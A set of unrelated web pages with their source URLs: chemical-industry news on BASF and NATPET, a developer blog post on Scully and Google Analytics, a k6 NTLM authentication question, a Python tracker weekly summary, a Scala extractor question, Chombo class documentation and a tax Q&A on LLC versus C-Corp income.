29 April 2010 10:38 [Source: ICIS news] (Adds detail about special items in paragraphs 4-5; chemicals performance in paragraphs 10, 12-13; outlook in paragraphs 16-18)

SINGAPORE (ICIS news)--BASF's first-quarter net profit nearly tripled to €1.03bn ($1.36bn), compared with a gain of €375m in the same quarter of 2009, partly due to higher demand in Asia and South America, the German chemicals major said on Thursday.

Sales in the first quarter climbed by 27% to €15.5bn, compared with €12.2bn in the first three months of 2009, the company said. BASF's operating income before special items was up 98% year on year to €1.95bn, mainly due to higher capacity utilisation, it said. This was offset by special items amounting to €114m, primarily the costs associated with the integration of Ciba, the company added. However, as the integration was now complete, BASF expected synergy gains of €350m by the end of 2010, increasing to more than €450m a year by the end of 2012.

First-quarter earnings before interest and tax (EBIT) nearly doubled to €1.84bn, from €928m in the first quarter of 2009, BASF said. Limited supplies of certain chemicals, as well as restocking of inventories among customers, buoyed demand in almost all business divisions, the company said. Renewed demand was particularly strong from the automotive, electric and electronic industries, which boosted revenues from the company's core segments such as chemicals and plastics, CEO Jurgen Hambrecht said. "Regionally, we saw high demand in Asia and South America," he said.

Alongside improved demand, higher product prices - for cracker products in the petrochemicals unit, for example - boosted sales in all chemicals divisions considerably, BASF added. Earnings were also substantially higher year on year thanks to high capacity utilisation and improved costs.
BASF said the business environment for plastics had been recovering steadily since the start of 2009, while the styrenics and fertilizer units experienced increasing volume demand, resulting in improved earnings for styrenics in particular. In the performance polymers division, higher raw material prices, partially due to limited availability, were largely passed on to the markets, the company added.

Looking ahead, Hambrecht said that despite the global economic upturn in the first quarter, he expected the economic recovery to slow over the course of the year. "This is primarily due to the basis effect through the comparison with the previous year," he said. Hambrecht saw risks to the recovery from "the continuing financial and debt crisis, the winding down of national stimulus programs, volatile raw materials markets, excess capacities, growing geopolitical tensions and protectionism". He cautioned that scheduled plant shutdowns for maintenance would have a negative impact on sales and earnings in the second quarter of 2010.

However, overall sales were expected to grow again in 2010 and outpace global chemical production, Hambrecht said. He added: "We anticipate that the income from operations before special items will improve considerably and that we will again earn a premium on our cost of capital."

($1 = €0.76) Additional reporting by Elaine Mills
http://www.icis.com/Articles/2010/04/29/9354835/basf-nearly-triples-q1-net-profit-to-1.03bn-on-improved-demand.html
Scully Helped us Reach a 99 Lighthouse Score for a B2C Platform

Ruslan Ponuzhdayev, a software engineer at Valor Software, shared this story and contributed greatly to the solution described.

You may have heard of JAMstack. It recently entered the top charts of technology choices for the web because of its ease of use, performance, and flexibility. Scully, a static site generator, brings JAMstack to the next level of effectiveness because of its Angular nature. Valor Software decided to adopt Scully to make the client's platform fast and really convenient to use. We sped up the overall page load and increased the platform's Lighthouse score to 99–100. Also, connecting Google eCommerce Marketing helped us see several areas for improvement on the website and in the mobile apps to streamline the user journey. Learn from our experience how you can achieve a boost in website performance and visibility for your project using Scully and Google Analytics. Also, I'm going to help you overcome possible difficulties with integrations, since we've already been there :)

Who the contributors are

Alexandr Pavlovskiy and Nikita Glukhi made it possible to bring all of this to life. Many thanks for being great team players and for their great contribution to the project. Also, Dima Shekhovtsov deserves special thanks for the idea, direction, and technical guidance!

Project background

Well, our team's job on this project was to reconsider a B2C platform for a game company. They had an outdated landing page, as well as mobile apps that users didn't really want to use. We were on a global mission to understand the current project situation, and then bring value. The client had no insights in terms of website load, performance, storage allocation, etc. And you can easily guess what we found once we peeked under the hood (a pile of legacy code). At this point, we understood that something new, quick, and easy to manage needed to be built instead.
That's how Scully came into play.

What is Scully and how to deploy it

JAMstack stands for JavaScript, APIs, and Markup. In this kind of architecture, JavaScript runs entirely on the client side and handles any dynamic programming. Reusable APIs cover all the server-side processes, and the Markup is prebuilt HTML, generated at build time by a static site generator or a build tool such as Webpack. Scully generates static sites for Angular apps, those with no backend code, so no API call is needed to get the data from the server. Instead, we put all the content on our pages as data and text and make it available to end users. This Scully Tutorial tells you all you need to know for smooth deployment.

Now the Lighthouse score reaches 100

We used Lighthouse, an open-source tool for checking and improving the quality of web pages, on this project. You can run it against any web page for performance, accessibility, SEO, and other audits. On completion, you get a report with suggestions for improvements, and all that is left is bringing those to life :-) The Lighthouse score represents the results from performance metrics that the tool gathered based on real website performance data. We used the score to evaluate the website's general performance: whether and how Scully changed the picture. And I can tell you that once we switched to Scully, the platform's Lighthouse score grew from 56 to 99–100. This indicator includes performance, accessibility, SEO, and application of best practices, as you can see from the screenshot below.

Better Google indexation — how to get the company to the top

If we remember the basics of Google's search logic, the crawling stage comes first: discovering publicly available web pages and connected links, and bringing this data back to the Google server. Then comes indexing, when Google tries to understand what the website is about in terms of content, images, video, etc., to categorize the object and put it "on the right shelf" in the huge Google index storage.
Finally, we have serving and ranking, when, in response to a user's query, Google goes through its index, searching for the most appropriate and highest-quality answer. Angular applications are rendered at runtime, so it takes Google bots longer to recognize the content, since they have to execute JS code first. And Scully helps us pre-render each route's HTML content. It generates a static version of each website page and eases the bots' mission to see the content. That's exactly what helped us improve the platform's indexing and visibility. Learn more about boosting SEO with the help of Scully from this Academind article about SEO optimization in Angular apps.

Making the overall CSS footprint smaller with Tailwind

To remove CSS that we don't need when building for production, we used Tailwind CSS. This CSS framework first of all lets you easily style your website or app. And, more importantly in our case, it helped us get rid of unused styles and optimize build size. As its creators claim, when removing unused styles with Tailwind, you never end up with more than 10kb of compressed CSS. Learn more about the framework and its worth from the Optimizing for Production material by Tailwind.

User growth and stronger involvement

Firstly, our release of an Alpha version of the platform tuned by Scully drew users to the product. By product, I mean in-app traits for gamers like a range of different cosmetics, including skins and pets. Scully brought us more visitors and buyers among those who already played the game and knew about the platform. Another part of the audience came because of better SEO optimization. Optimized content made the platform visible and helped new users find the website. You can see the situation before and after in the screenshot below (please don't mind the red area; it shows the moment of deployment, when we couldn't track users' activity). As a result, from the moment we released the new platform version, sales doubled.
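Returning to the Tailwind point above: the unused-style removal is driven entirely by the Tailwind config file. Here is a minimal sketch of what that might look like for a Tailwind v2 project (current when this post was written); the content paths are assumptions, not the actual project layout:

```javascript
// tailwind.config.js — a minimal sketch; the source-file paths are placeholders.
// With Tailwind v2, the `purge` option lists the files Tailwind scans during a
// production build; every utility class not found in them is dropped from the
// final CSS, which is what keeps the compressed output small.
module.exports = {
  purge: ['./src/**/*.html', './src/**/*.ts'],
  darkMode: false,
  theme: {
    extend: {},
  },
  variants: {},
  plugins: [],
};
```

Purging only runs when `NODE_ENV` is set to `production`, so development builds keep the full stylesheet for convenience.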
Integration of Google eCommerce Marketing

The eCommerce part of Google Analytics is what you definitely want to apply to gather insights on user behavior and preferences. You can also understand who makes up your core audience, if that's what you lack, and then build more efficient marketing campaigns. eCommerce gives you access to your audience's gender, age, and geographical location. The only thing you should take care of to obtain the needed data is tags. You've got to manage them right when setting up analytics. The following links will help you tune your tags for enhanced eCommerce:

- dataLayer.push with examples
- A Guide to Google Analytics User ID in Google Tag Manager
- Set Up Ecommerce Tracking with Google Tag Manager: Full Guide
- Enhanced eCommerce Guide for Google Tag Manager

We integrated Google eCommerce tracking and provided our clients with the data they needed for planning future website and mobile app upgrades. One of the most important things we started to track is the checkout process: from the moment the product falls into the basket, through filling in the form for online payment, to the actual purchase. Clients could see what may stop a user from a purchase, what stands in the way of completing checkout. Now they have a data-driven basis for targeting bigger goals in the future.

Bridging Google Analytics' tags and your Scully platform

Earlier, we added a complete JavaScript tracking-code snippet into the HTML of our platform (just as described in this PPCexpo material). But when we switched to Scully and went on to connect Google Analytics to the Scully website, a conflict between Google Tag Manager and HTTPS packages arose.
So, we created a plugin to pre-build this connection, so that Scully adds the piece of code for Google Analytics without any modifications:

```typescript
import { registerPlugin, getMyConfig } from '@scullyio/scully';

export const GoogleAnalytics = 'googleAnalytics';

export const googleAnalyticsPlugin = async (html: string): Promise<string> => {
  const googleAnalyticsConfig = getMyConfig(googleAnalyticsPlugin);
  if (!googleAnalyticsConfig || !googleAnalyticsConfig['globalSiteTag']) {
    throw new Error('googleAnalytics plugin missing Global Site Tag');
  }
  const siteTag: string = googleAnalyticsConfig['globalSiteTag']; // your gtmTagId
  const googleAnalyticsScript = `
    // your GA script code here
  `;
  return html.replace(/<\/head/i, `${googleAnalyticsScript}</head`);
};

const validator = async () => [];

registerPlugin('postProcessByHtml', GoogleAnalytics, googleAnalyticsPlugin, validator);
```

Use this instruction for implementing Google Tag Manager on your website; that's where you get the Google Tag Manager snippet from. And this article tells you how to get your Google Tag Manager ID.

Here's where you should place the plugin

The Scully config file is generated automatically when we connect Scully to our Angular app. It is located in the root folder, next to package.json. Of course, we get a default Scully config, and then we should customize it for our project. This Guide to custom Scully plugins gives good advice for customizing plugins to your needs.

Summary

This switch to JAMstack and Scully gave us a tremendous number of benefits, including some that neither we nor the client expected to get. For example, the better Google indexing was a surprise. From my point of view, the main gain for this project (just like for most of them) is transparency. With such a clear structure and interaction between frontend and backend, you know exactly what's happening on your Scully website. And when you know, you can react, and actually handle complexities that arise.
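To make the plugin-placement advice above concrete, here is a sketch of what wiring the Google Analytics plugin into the Scully config might look like. The project name, paths, and tag ID are placeholders, and the plugin's import path is an assumption; `setPluginConfig`, `defaultPostRenderers`, and the config shape follow Scully's documented API:

```typescript
// scully.my-app.config.ts — a sketch; project name, outDir, import path and
// the GTM tag ID below are all placeholders, not values from the real project.
import { ScullyConfig, setPluginConfig } from '@scullyio/scully';
import { GoogleAnalytics } from './scully/plugins/google-analytics';

// Supplies the config that the plugin reads back via getMyConfig().
setPluginConfig(GoogleAnalytics, { globalSiteTag: 'GTM-XXXXXXX' });

export const config: ScullyConfig = {
  projectRoot: './src',
  projectName: 'my-app',
  outDir: './dist/static',
  // Runs the postProcessByHtml plugin on every rendered route.
  defaultPostRenderers: [GoogleAnalytics],
  routes: {},
};
```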
Sure, there's still much work to do, but we have bright prospects. We plan to deepen the tracking of eCommerce indicators, since this will give the client more ground for new business moves. Also, we'll be working on the mobile apps to increase user engagement even more! Here I shared our first experience with, and first impressions of, the technology. Hopefully, you'll find the story useful. Please don't hesitate to share your feedback, give advice, or contact Valor Software to give your business a boost!

Useful links

1. Scully Tutorial
2. Optimizing for Production material by Tailwind
3. Academind article about SEO optimization in Angular apps
4. Enhanced eCommerce Guide for Google Tag Manager
5. Guide to custom Scully plugins
https://valorsoftware.medium.com/scully-helped-us-reach-a-99-lighthouse-score-for-a-b2c-platform-e1ac5599897b?source=user_profile---------8----------------------------
Hi, I am trying to authorize with NTLM auth, but can't seem to get it right. I can authorize with Postman and NTLM auth there, but my script still gets 401s… Here is a simple version of the script:

```javascript
import http from "k6/http";
import { check, sleep } from "k6";

export default function () {
  let res = http.get("", { auth: "ntlm" });
  console.log("Status code: " + res.status);
  check(res, { "status was 200": (r) => r.status == 200 });
  sleep(1);
}
```

Is there any way to debug the NTLM part? How do I know that it actually tried to authorize with NTLM? Request output:

GET URLENDPOINT HTTP/1.1
Host: BASEURL
User-Agent: k6/0.25.0 ()
Accept-Encoding: gzip

Here's the response:

HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 16 Oct 2019 14:32:43 GMT
Server: Apache/2.4.37 (Win64) OpenSSL/1.0.2q-fips mod_jk/1.2.46
Www-Authenticate: Negotiate
Www-Authenticate: NTLM

f
Access Denied.
0

If I remove the NTLM auth from Postman, the response is like the one from the script. If I type a wrong password, I get a set-cookie in the response… It seems to me that k6 doesn't try the NTLM auth.
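For reference, k6's documentation describes NTLM authentication as requiring the username and password to be embedded in the URL itself; with `auth: "ntlm"` and an empty URL as in the snippet above, there are no credentials for k6 to negotiate with, which would explain the unanswered 401. A sketch of the documented shape (host and credentials are placeholders; this runs under the k6 runtime via `k6 run script.js`, not plain Node):

```javascript
// k6 script — host, username and password below are placeholders.
import http from "k6/http";
import { check, sleep } from "k6";

export default function () {
  // k6 takes the NTLM credentials from the URL when auth is "ntlm".
  const url = "https://user:passwd@example.com/protected/resource";
  const res = http.get(url, { auth: "ntlm" });

  check(res, { "status was 200": (r) => r.status === 200 });
  sleep(1);
}
```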
https://community.k6.io/t/unauthorized-with-ntlm-auth/262
11 June 2012 04:31 [Source: ICIS news] SINGAPORE (ICIS)--NATPET and A Schulman have entered into a 50:50 joint venture for the project, which will be built in two phases, Alujain said in a filing to the Saudi Stock Exchange (Tadawul) on 10 June. The first phase of the project is estimated to cost Saudi riyal (SR) 266m ($71m), which will be funded via 40% equity and 60% debt, the company said. The joint-venture PP compounding unit will be located near NATPET's 400,000 tonne/year PP plant in Yanbu. "The joint venture will enable A Schulman and NATPET to serve a broad range of customers globally, and capitalise on growing demand for durable goods such as appliances and automotives in the Middle East, Africa and" NATPET has also agreed to enter into a distribution agreement with A Schulman, in which the Ohio-based firm will distribute resins for NATPET. A Schulman is a global supplier of high-performance plastics, masterbatches, specialty powders, and distribution services. It has a 3,100-strong workforce and 36 manufacturing facilities globally. NATPET is a subsidiary of Alujain, which is a Saudi joint stock company set up in 1991 by a group of prominent Saudi/Gulf businessmen, according to the company's website.
http://www.icis.com/Articles/2012/06/11/9567926/natpet-a-schulman-build-pp-compounding-unit-in-saudi-arabia.html
ACTIVITY SUMMARY (2021-03-12 - 2021-03-19) Python tracker at To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 7481 ( +3) closed 47813 (+75) total 55294 (+78) Open issues with patches: 2980 Issues opened (66) ================== #35943: PyImport_GetModule() can return partially-initialized module reopened by pitrou #37788: fix for bpo-36402 (threading._shutdown() race condition) cause reopened by mark.dickinson #42161: Remove private _PyLong_Zero and _PyLong_One variables reopened by rhettinger #43334: venv does not install libpython reopened by anuppari #43439: [security] Add audit events on GC functions giving access to a reopened by steve.dower #43481: PyEval_EvalCode() namespace issue not observed in Python 2.7. opened by chrisgmorton #43482: Py_AddPendingCall Inserted Function Never Called in 3.8, works opened by chrisgmorton #43484: we can create valid datetime objects that become invalid if th opened by zzzeek #43486: Python 3.9 installer not updating ARP table opened by codaamok #43487: Rename __unicode__ methods to __str__ in 2to3 conversion opened by bartbroere #43490: IDLE freezes at random opened by aledeaux #43492: Upgrade to SQLite 3.35.2 in macOS and Windows opened by erlendaasland #43493: EmailMessage mis-folding headers of a certain length opened by mglover #43494: Minor changes to Objects/lnotab_notes.txt opened by skip.montanaro #43495: Missing frame block push in compiler_async_comprehension_gener opened by tomkpz #43497: SyntaxWarning for "assertion is always true, perhaps remove pa opened by darke #43498: "dictionary changed size during iteration" error in _ExecutorM opened by kulikjak #43500: Add filtercase() into fnmatch opened by wyz23x2 #43501: email._header_value_parse throws AttributeError on display nam opened by elenril #43502: [C-API] Convert obvious unsafe macros to static inline functio opened by erlendaasland #43503: [subinterpreters] PyObject 
statics exposed in the limited API opened by eric.snow #43504: effbot.org down opened by mdk #43505: [sqlite3] Explicitly initialise and shut down sqlite3 opened by erlendaasland #43508: Miscompilation information for tarfile.open() when given too m opened by xxm #43509: CFunctionType object should be hashable in Python opened by xxm #43510: PEP 597: Implemente encoding="locale" option and EncodingWarni opened by methane #43511: tkinter with Tk 8.6.11 is slow on macOS opened by thomaswamm #43513: venv: recreate symlinks on --upgrade opened by ThiefMaster #43514: Disallow fork in a subinterpreter affects multiprocessing plug opened by franku #43517: Fix false positives in circular import detection with from-imp opened by pitrou #43518: textwrap.shorten does not always respect word boundaries opened by annesylvie #43520: Fraction only handles regular slashes ("/") and fails with oth opened by weightwatchers-carlanderson #43522: SSLContext.hostname_checks_common_name appears to have no effe opened by Quentin.Pradet #43523: Handling Ctrl+C while waiting on I/O in Windows opened by sovetov #43524: Addition of peek and peekexactly methods to asyncio.StreamRead opened by awalgarg #43525: pathlib: Highlight pathlib operator behavior with anchored pat opened by diegoe #43526: Programmatic management of BytesWarning doesn't work for nativ opened by xmorel #43527: Support full stack trace extraction in warnings. opened by xmorel #43528: "connect_read_pipe" raises errors on Windows for STDIN opened by ivankravets #43529: pathlib.Path.glob causes OSError encountering symlinks to long opened by eric.frederich #43530: email.parser.BytesParser failed to parse mail when it is with opened by tzing #43532: Add keyword-only fields to dataclasses opened by eric.smith #43533: Exception and contextmanager in __getattr__ causes reference c opened by crccw #43534: turtle.textinput window is not transient opened by quid256 #43535: Make str.join auto-convert inputs to strings. 
opened by rhettinger #43536: 3.9.2 --without-pymalloc --with-pydebug --with-valgrind: test opened by Thermi #43537: interpreter crashes when handling long text in input() opened by xxm #43538: [Windows] support args and cwd in os.startfile() opened by eryksun #43539: test_asyncio: test_sendfile_close_peer_in_the_middle_of_receiv opened by vstinner #43540: importlib: Document how to replace load_module() in What's New opened by vstinner #43542: Add image/heif(heic) to list of media types in mimetypes.py opened by martbln #43544: mimetype default list make a wrong guess for illustrator file opened by Inkhey #43545: Use LOAD_GLOBAL to set __module__ in class def opened by bup #43546: "Impossible" KeyError from importlib._bootstrap acquire line 1 opened by anentropic #43547: support ZIP files with zeroed out fields (e.g. for reproducibl opened by eighthave #43548: RecursionError depth exceptions break pdb's interactive tracin opened by behindthebrain #43549: Outdated descriptions for configuring valgrind. 
opened by xxm #43550: pip.exe is missing from the NuGet package opened by gipetrou #43551: [Subinterpreters]: PyImport_Import use static silly_list under opened by JunyiXie #43552: Add locale.get_locale_encoding() and locale.get_current_locale opened by vstinner #43553: [sqlite3] Improve test coverage opened by erlendaasland #43554: email: encoded headers lose their quoting when refolded opened by Emil.Styrke #43555: Location of SyntaxError with new parser missing (after continu opened by aroberge #43556: fix attr names for ast.expr and ast.stmt opened by samwyse #43557: Deprecate getdefaultlocale(), getlocale() and normalize() func opened by vstinner #43558: The dataclasses documentation should mention how to call super opened by eric.smith Most recent 15 issues with no replies (15) ========================================== #43558: The dataclasses documentation should mention how to call super #43556: fix attr names for ast.expr and ast.stmt #43555: Location of SyntaxError with new parser missing (after continu #43554: email: encoded headers lose their quoting when refolded #43553: [sqlite3] Improve test coverage #43551: [Subinterpreters]: PyImport_Import use static silly_list under #43550: pip.exe is missing from the NuGet package #43549: Outdated descriptions for configuring valgrind. 
#43548: RecursionError depth exceptions break pdb's interactive tracin #43545: Use LOAD_GLOBAL to set __module__ in class def #43544: mimetype default list make a wrong guess for illustrator file #43542: Add image/heif(heic) to list of media types in mimetypes.py #43538: [Windows] support args and cwd in os.startfile() #43533: Exception and contextmanager in __getattr__ causes reference c #43530: email.parser.BytesParser failed to parse mail when it is with Most recent 15 issues waiting for review (15) ============================================= #43553: [sqlite3] Improve test coverage #43552: Add locale.get_locale_encoding() and locale.get_current_locale #43551: [Subinterpreters]: PyImport_Import use static silly_list under #43542: Add image/heif(heic) to list of media types in mimetypes.py #43534: turtle.textinput window is not transient #43532: Add keyword-only fields to dataclasses #43525: pathlib: Highlight pathlib operator behavior with anchored pat #43522: SSLContext.hostname_checks_common_name appears to have no effe #43517: Fix false positives in circular import detection with from-imp #43510: PEP 597: Implemente encoding="locale" option and EncodingWarni #43503: [subinterpreters] PyObject statics exposed in the limited API #43502: [C-API] Convert obvious unsafe macros to static inline functio #43501: email._header_value_parse throws AttributeError on display nam #43498: "dictionary changed size during iteration" error in _ExecutorM #43497: SyntaxWarning for "assertion is always true, perhaps remove pa Top 10 most discussed issues (10) ================================= #43552: Add locale.get_locale_encoding() and locale.get_current_locale 25 msgs #42128: Structural Pattern Matching (PEP 634) 13 msgs #43503: [subinterpreters] PyObject statics exposed in the limited API 13 msgs #43313: feature: support pymalloc for subinterpreters. 
each subinterpr 9 msgs #43502: [C-API] Convert obvious unsafe macros to static inline functio 9 msgs #43475: Worst-case behaviour of hash collision with float NaN 8 msgs #43244: Move PyArena C API to the internal C API 7 msgs #43466: ssl/hashlib: Add configure option to set or auto-detect rpath 7 msgs #43478: Disallow Mock spec arguments from being Mocks 7 msgs #35883: Python startup fails with a fatal error if a command line argu 6 msgs Issues closed (74) ================== #12777: Inconsistent use of VOLUME_NAME_* with GetFinalPathNameByHandl closed by eryksun #15453: ctype with packed bitfields does not match native compiler closed by eryksun #15698: PEP 3121, 384 Refactoring applied to pyexpat module closed by vstinner #18017: ctypes.PyDLL documentation closed by eryksun #22781: ctypes: Differing results between Python and C. closed by eryksun #25012: pathlib should allow converting to absolute paths without reso closed by eryksun #25117: Windows installer: precompiling stdlib fails with missing DLL closed by steve.dower #26882: The Python process stops responding immediately after starting closed by eryksun #27820: Possible bug in smtplib when initial_response_ok=False closed by orsenthil #28344: Python 3.5.2 installer hangs when run in session 0 closed by eryksun #29586: Cannot run pip in fresh install of py 3.5.3 closed by steve.dower #29687: smtplib does not support proxy closed by christian.heimes #29982: tempfile.TemporaryDirectory fails to delete itself closed by gvanrossum #31103: Windows Installer Product does not include micro version in di closed by steve.dower #32434: pathlib.WindowsPath.reslove(strict=False) returns absoulte pat closed by eryksun #33129: Add kwarg-only option to dataclass closed by eric.smith #33136: Harden ssl module against CVE-2018-8970 closed by gregory.p.smith #33159: Implement PEP 473 closed by skreft #33603: Subprocess Thread handles grow with each call and aren't relea closed by eryksun #33780: [subprocess] Better Unicode 
support for shell=True on Windows closed by eryksun #34187: Issues with lazy fd support in _WindowsConsoleIO fileno() and closed by eryksun #34840: dlopen() error with no error message from dlerror() closed by eryksun #35216: misleading error message from shutil.copy() closed by eryksun #36646: os.listdir() got permission error in Python3.6 but it's fine i closed by eryksun #37820: Unnecessary URL scheme exists to allow 'URL: reading file in u closed by christian.heimes #39340: shutil.rmtree and write protected files closed by eryksun #39342: Expose X509_V_FLAG_ALLOW_PROXY_CERTS in ssl closed by christian.heimes #40540: inconstent stdin buffering/seeking behaviour closed by eryksun #40763: zipfile.extractall is safe by now closed by gregory.p.smith #41123: Remove Py_UNICODE APIs except PEP 623 closed by methane #41200: Add pickle.loads fuzz test closed by gregory.p.smith #41567: multiprocessing.Pool from concurrent threads failure on 3.9.0r closed by pitrou #41883: ctypes pointee goes out of scope, then pointer in struct dangl closed by eryksun #41933: Wording of s * n in Common Sequence Operations is not optimal closed by mdk #42322: Spectre mitigations in CPython interpreter closed by gregory.p.smith #42370: test_ttk_guionly: test_to() fails on the GitHub Ubuntu job closed by vstinner #42730: TypeError/hang inside of Time.Sleep() when _thread.interrupt_m closed by eryksun #43065: Delegating to thread and process deadlocks closed by doublex #43068: test_subprocess: test_specific_shell() fails on AMD64 FreeBSD closed by vstinner #43175: filecmp is not working for UTF-8 BOM file. 
closed by eryksun #43199: FAQ about goto lacks answer closed by terry.reedy #43214: site: Potential UnicodeDecodeError when handling pth file closed by methane #43228: Regression in function builtins closed by vstinner #43245: Add keyword argument support to ChainMap.new_child() closed by rhettinger #43285: ftplib should not use the host from the PASV response closed by gregory.p.smith #43353: Document that logging.getLevelName() can return a numeric valu closed by felixxm #43357: Python memory cleaning closed by gregory.p.smith #43382: github CI blocked by the Ubuntu CI with an SSL error closed by christian.heimes #43410: Parser does not handle correctly some errors when parsin from closed by pablogsal #43427: Possible error on the descriptor howto guide closed by rhettinger #43428: Sync importlib_metadata enhancements through 3.7. closed by jaraco #43437: venv activate bash script has wrong line endings on windows closed by eryksun #43441: [Subinterpreters]: global variable next_version_tag cause meth closed by vstinner #43444: [sqlite3] Move MODULE_NAME def from setup.py to module.h closed by berker.peksag #43462: canvas.bbox returns None on 'hidden' items while coords doesn' closed by Vincent #43477: from x import * behavior inconsistent between module types. closed by brett.cannon #43479: Remove a duplicate comment and assignment in http.client closed by orsenthil #43483: Loss of content in simple (but oversize) SAX parsing closed by ridgerat1611 #43485: Spam closed by zach.ware #43488: Added new methods to vector.py closed by rhettinger #43489: Can't install, nothing to install closed by ned.deily #43491: Windows filepath bug closed by eryksun #43496: macOS tkinter Save As doesn't accept keyboard shortcuts closed by terry.reedy #43499: Compiler warnings in building Python 3.9 on Windows closed by serhiy.storchaka #43506: PEP 624: Update document for removal schedule closed by methane #43507: Variables in locals scope fails to be printed. 
closed by mark.dickinson #43512: Bug in isinstance(instance, cls) with cls being a protocol? (P closed by gvanrossum #43515: Lazy import in concurrent.futures produces partial import erro closed by pitrou #43516: python on raspberry pi closed by eric.smith #43519: access python private variable closed by steven.daprano #43521: Allow `ast.unparse` to handle NaNs and empty sets closed by pablogsal #43531: Turtle module does not work closed by mark.dickinson #43541: PyEval_EvalCodeEx() can no longer be called with code which ha closed by vstinner #43543: Spam closed by petr.viktorin
https://mail.python.org/archives/list/python-dev@python.org/thread/5H3JH3KFIHAO3DDSXHL7DAFVTIYQ5NG3/
- class extractor works differently when handwritten
Thu, 2011-08-11, 10:39

Hi everyone, before I open a bug report, I would like to have your opinion on the following. According to the Scala specification, the extractor built for case classes is the following (Scala specification §5.3.2):

```scala
def unapply[tps](x: c[tps]) =
  if (x eq null) scala.None
  else scala.Some(x.xs11, ..., x.xs1k)
```

For implementation reasons, I want to be able to mimic the behavior of this extractor on a non-case class. However, my implementation fails to reproduce the same behavior. Here is an example of the difference I see:

```scala
trait A

sealed trait B[X <: A] { val x: X }

case class C[X <: A](x: X) extends B[X]

class D[X <: A](val x: X) extends B[X]

object D {
  def unapply[X <: A](d: D[X]): Option[X] =
    if (d eq null) None else Some(d.x)
}

def ext[X <: A](b: B[X]) = b match {
  case C(x) => Some(x)
  case D(x) => Some(x)
  case _    => None
}
```

I get the following warning:

:37: warning: non variable type-argument X in type pattern D[X] is unchecked since it is eliminated by erasure
        case D(x) => Some(x)

Notice the warning occurs only in the D case, not in the case-class extractor case. Do you have any idea about the cause of the warning, or about what I should do to avoid it? Furthermore, the ASTs of objects C and D seem to have the same content for the unapply method.

Note: if you want to test this in the REPL, the easiest way is to activate unchecked warnings:

scala> :power
scala> settings.unchecked.value = true

then copy the above code in paste mode:

scala> :paste
[copy/paste]
[ctrl + D]

Note: this message was first submitted to Stack Overflow.

Best regards
-- Nicolas
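For what it's worth, one common workaround for this class of warning (my suggestion, not from the original thread) is to annotate the type argument in the pattern with `@unchecked`, acknowledging that erasure prevents the runtime check:

```scala
// A sketch of silencing the warning: `@unchecked` tells the compiler we
// accept that the type argument X cannot be verified at runtime, so the
// erasure warning is suppressed for this pattern.
def ext2[X <: A](b: B[X]): Option[X] = b match {
  case C(x)               => Some(x)
  case d: D[X @unchecked] => Some(d.x)
  case _                  => None
}
```

This does not explain why the compiler treats the synthetic case-class extractor differently, but it makes the handwritten version compile warning-free.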
http://www.scala-lang.org/old/node/10631
#include <NodeCFIVS.H>

Class to get the IntVectSet of nodes (of a particular face of a particular box) that lie on the interface with the next coarser level. This class should be considered internal to AMRNodeSolver and should not be considered part of the Chombo API.

~NodeCFIVS
    Destructor.

define
    Full define function. The current level is taken to be the fine level. (Two overloads are provided.)

isEmpty
    Returns true if this coarse-fine IntVectSet is empty.

isPacked
    Returns true if this coarse-fine IntVectSet can be represented as just a Box, i.e., a user can perform a dense computation instead of a pointwise calculation using IVSIterator. If isPacked() then you can use packedBox() instead of getFineIVS().

packedBox
    If isPacked() returns true, then the box returned by this function is a suitable substitute for the IntVectSet returned by getFineIVS(). References m_packedBox.

getFineIVS
    Returns indices of fine nodes, on the face of the box, that lie on the interface with the coarser level and where data need to be interpolated. This will be empty if isEmpty() returns true. If isPacked() then you can use packedBox() instead of getFineIVS(). Returns: indices of fine nodes that need to be interpolated.
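The isPacked()/packedBox() distinction above can be illustrated with a small sketch: an index set is "packed" exactly when it fills its own bounding box, so a dense loop over the box can replace pointwise iteration. This is a hypothetical helper in plain Python for illustration only, not Chombo code (which is C++):

```python
def is_packed(points):
    """Return (packed, box) for a set of integer (i, j) node indices.

    `packed` is True when the indices exactly fill their bounding box,
    in which case iterating over `box` densely visits the same nodes
    as iterating over the set pointwise.
    """
    pts = set(points)
    if not pts:
        return False, None
    i_lo = min(i for i, j in pts)
    i_hi = max(i for i, j in pts)
    j_lo = min(j for i, j in pts)
    j_hi = max(j for i, j in pts)
    box = (i_lo, j_lo, i_hi, j_hi)
    dense_count = (i_hi - i_lo + 1) * (j_hi - j_lo + 1)
    return len(pts) == dense_count, box
```

A 2x2 block of indices is packed; the same bounding box with corners only is not, and would require pointwise iteration (the role IVSIterator plays in Chombo).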
http://davis.lbl.gov/Manuals/CHOMBO-RELEASE-3.2/classNodeCFIVS.html
Tax
Have a Tax Question? Ask a Tax Expert

Hi. You have already received the check (made out to you personally, rather than to the LLC or C-Corp)?

Yes, and deposited.

Because an LLC and a sole proprietorship are pass-through entities, the amount (after deducting business expenses, as you mention) will end up on line 12 of your personal income tax return (business income or loss). That, from a tax standpoint, is probably the best, XXXXX XXXXX for two reasons: (1) the C-Corp (paying its own taxes at corporate rates) may be at a higher bracket than you, individually ... AND ... (2) after the C-Corp pays its own taxes, any dividends you pull for yourself will be taxed again at your individual level (this is the double taxation you hear about with regard to C-Corps). It really depends on an analysis of YOUR personal marginal tax rate for the year, as compared to the C-Corp's rate.

Should I just pay the consultant through my personal account that the check was deposited in, or transfer to the LLC and pay from there?

However, if the check wasn't made out TO the C-Corp, this may be a non-issue anyway (unless you can have the maker stop payment and re-issue to the C-Corp).

Too late for that, plus it took 6 months to finally get payment....

Either way works, again because the net profit will be taxed at your personal level from either the LLC or the sole prop ... from a liability standpoint, it WOULD be better to run everything through the C-Corp.

I need to transfer some of those funds to the C-Corp to cover some expenses. How should that be classified on the C-Corp's books?

Understand, but yes ...
I would do it all through the LLC; you'll just file a Schedule C for the LLC as an attachment to your 1040, and you will have that expense (and any other business expenses of the LLC) deducted before carrying it to the 1040. This doesn't touch the C-Corp's books at all IF the check was made to you personally (the C-Corp did not do this business). And because the tax effect (and ownership) is effectively the same for the sole prop and the LLC (both disregarded entities by the IRS), just deposit it to the LLC account and report it there.

Yes, I know. I just need money in the C-Corp account to pay other expenses. Should this be a loan to the corp from the LLC, or categorized as some sort of equity investment?

Sure, you can just contribute the money to the C-Corp as a capital investment (it will increase your basis in the C-Corp, should you ever sell it). BUT you'll still need to report the INCOME (or rather the profit left after taking business expenses) on your tax return (again, BEST done through the LLC).

Got it... So I record it as a Capital Investment in the C-Corp books. Thanks.

